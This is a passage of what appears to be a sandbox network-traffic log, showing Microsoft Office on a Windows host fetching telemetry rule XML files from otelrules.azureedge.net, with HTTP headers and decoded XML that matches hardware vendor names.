2024-11-11 00:14:56 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:55 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-16547b76f7fkcrm9hC1DFWxdag0000000de000000000db76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:56 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 1deec2f0-101e-0046-4768-3291b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-17df447cdb5zfhrmhC1DFWh33000000009h000000000kv5b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:56 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: ee786005-101e-0065-140e-2d4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-16547b76f7fq9mcrhC1DFWq15w0000000deg0000000000u0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:56 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 0cc43b16-c01e-00a2-215a-322327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-17df447cdb528ltlhC1DFWnt1c00000009m00000000006wm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:56 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:56 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 23cb21e1-e01e-0052-4e08-2cd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-16547b76f7fp46ndhC1DFW66zg0000000deg0000000075tp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:56 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:56 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:57 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:56 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 9ed703a9-f01e-0020-1358-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001456Z-17df447cdb5km9skhC1DFWy2rc0000000a00000000009hrt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:57 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:57 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:57 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:57 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 52c466ac-c01e-007a-7901-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001457Z-16547b76f7frbg6bhC1DFWr5400000000d5g00000000rrk1 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:57 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:57 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:57 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:57 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001457Z-16547b76f7fr28cchC1DFWnuws0000000dfg00000000avyz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:57 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:57 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:57 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:57 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: c83fd6ce-601e-0001-1a50-32faeb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001457Z-17df447cdb5lrwcchC1DFWphes00000009u0000000000yb9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 00:14:57 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:57 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:57 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:57 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: c89d4726-401e-0048-4b4b-330409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001457Z-15869dbbcc6x4rp4hC1DFW3t7w0000000fn000000000auzp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:57 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:57 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 00:14:57 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 00:14:57 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 8ea7b729-301e-006e-7438-33f018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T001457Z-17df447cdb5bz95mhC1DFWnk7w00000009e000000000prvs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 00:14:57 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 00:14:58 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
